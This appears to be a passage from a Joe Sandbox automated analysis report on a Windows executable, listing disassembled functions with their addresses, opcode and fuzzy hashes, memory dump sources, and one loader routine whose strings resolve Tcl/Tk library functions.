                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 77a137f81fa1c86087b3fd9088994328934f22d67f6cc1e45e2630c66c22d56c
                                                                                                                                                                                                            • Instruction ID: d79746b13ec76bdf0565cd082de5fa8fa84bd5ab7ed8c77ac5f0e9d3af490df9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77a137f81fa1c86087b3fd9088994328934f22d67f6cc1e45e2630c66c22d56c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54B18F72A0E78595EB649F39C05023CFBA0EB45B88FA641B5EB4E673A5CF39D441C720
                                                                                                                                                                                                            Function 00007FF7ACE9D648 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3d476ef08b322c58c4413e10f71b0ed5290530b08392bb97c7a41ba5f57d2c99
                                                                                                                                                                                                            • Instruction ID: 95752102e7db863732298fa83a79e400dbe8f544f1edb9fe050b15950babcb7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d476ef08b322c58c4413e10f71b0ed5290530b08392bb97c7a41ba5f57d2c99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B814872A0D39196EB74DB19E440379EA90FB45794F814235EA8D9BBA5CF3CD2008B10
                                                                                                                                                                                                            Function 00007FF7ACEA5750 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 1095f843d98438b20cb337fae70872a3e7dc8e72d94470ea3cbe73f8aa7f40ad
                                                                                                                                                                                                            • Instruction ID: 0ccd6713f64d11fb8b63faded1ab737340705aa59fe2fc301d6bc3bd8b35a33b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1095f843d98438b20cb337fae70872a3e7dc8e72d94470ea3cbe73f8aa7f40ad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA610E72E1FA926EFF68A524444027DE681AF40771FDE4239D76D566F1DE3CE8408720
                                                                                                                                                                                                            Function 00007FF7ACE90EE4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                            • Instruction ID: 300a468a7dcf61ea5d5385fc49cf39f8c11b221e6ab982b427b74ed60a095cfa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B451D636A1EA5196E7249B29C140238F3A0EB48F68FA54171EE4D277F5CB3BE943C750
                                                                                                                                                                                                            Function 00007FF7ACE912F4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                            • Instruction ID: 540d6099881b020acd6f9b3ab19b3ae08d3bb857f53c9cc92dd2996fd30a7799
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89517076A1E65192E7249B39C04023CF3B1EB49B68F664171EE4D67BB4CB3AE843C750
                                                                                                                                                                                                            Function 00007FF7ACE90AD4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                            • Instruction ID: 503df94281f10e6c1371af0c33226984967f8f2db6b9cf0b8aa59610634f1438
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67519432A1E65196E7249F69C04022CF3A0EB49F6CFA64171EE4D277B5DB3AE842C750
                                                                                                                                                                                                            Function 00007FF7ACE910F0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                            • Instruction ID: d2ec3f13cb23cdf774a977ca2fc0e32b881676758da7e05d1f7c5b014f6a2178
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3951B337A1E651A1E724AB39C04023CE7B1EB45F98FA54171EA4C677A4CB3AE842C750
                                                                                                                                                                                                            Function 00007FF7ACE908D0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                            • Instruction ID: 919a9bf59ca1a8056ca4f73f45d2bd51575e026433c63f805b3b2c37013f366d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6751B536A1E65195F7249B69C040238F7A0EB89F68FE55171EE4C277A4CB3AEC42C790
                                                                                                                                                                                                            Function 00007FF7ACE90CE0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                            • Instruction ID: 1b05b0bbed1b6caa74b71df5d1fbdabad446fbf972f29709a4e3224f4d1dff31
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD519336A1E65196EB249B69C04033CF7A0EB49B58FE54171EE4D277B8CB3AF842C750
                                                                                                                                                                                                            Function 00007FF7ACE94E80 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                            • Instruction ID: f73959eef9934839646436711f3e63fc8a39b2a903b6ccec79020e10498e4bf9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC41B5B281F74B55FD56991805046B8E6C0AF227A0DDA63F4FD9B333F2DD0CA586C161
                                                                                                                                                                                                            Function 00007FF7ACE98AD0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 78dcf682790de8efd8091c6720d965e488dfd40db2a2618002f9ee551094d6b6
                                                                                                                                                                                                            • Instruction ID: a1d850fa71989458f5179218ab479bc0e2b06bd955f7ac1936fae41fbc38f286
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78dcf682790de8efd8091c6720d965e488dfd40db2a2618002f9ee551094d6b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4410A72719A5995EF14DF26D964179F392B748FC0F4A9032EE0DABB68DE3CC5428300
                                                                                                                                                                                                            Function 00007FF7ACE96490 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                                                                                                            • Instruction ID: 5ba6223915a384ff9dd1fa8f143d38298b976dfa85b48afc4ff16d85d1f4fa91
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B031C432B0EB8251E764AF21644012EE699AB84B90F454279FA5E63BF9DF3CD1018614
                                                                                                                                                                                                            Function 00007FF7ACEA88E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 5cc313cde0fef028e89f201561a38ee75bc55530e34bae0ee9c1053def84ead7
                                                                                                                                                                                                            • Instruction ID: 37cce1612df64bf76fae2580c1494167d2e5bd631b23f6d3bb77ce5cd8625ac3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cc313cde0fef028e89f201561a38ee75bc55530e34bae0ee9c1053def84ead7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F06272B1D2959ADBA49F2DA802629B7D0F748380F80803DE69DC7B18D63DD1608F54
                                                                                                                                                                                                            Function 00007FF7ACE8B7C0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6c002e7d7884e8c4061cd0b6b52ae5efdc83914f73eae79fef453be1d5e57078
                                                                                                                                                                                                            • Instruction ID: af0620f5329bd1a35c6ef7951f9bd95bce40a10ed546ab8812ea27c9c7a4c7a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c002e7d7884e8c4061cd0b6b52ae5efdc83914f73eae79fef453be1d5e57078
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13A0017295EA46F4EA95AB00E960030A220FB60382BCA2131D00D614B49E2DE5108720
                                                                                                                                                                                                            Function 00007FF7ACE855B0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                            • API String ID: 2238633743-1453502826
                                                                                                                                                                                                            • Opcode ID: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
                                                                                                                                                                                                            • Instruction ID: 5d20e367a171e35ee49b282444539146df545677df75b314cf85fa20483d0628
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E1E274A0FB83B8FE55EF15A981174A3A5AF04782BDA6031D80E362B4EF7CE4548370
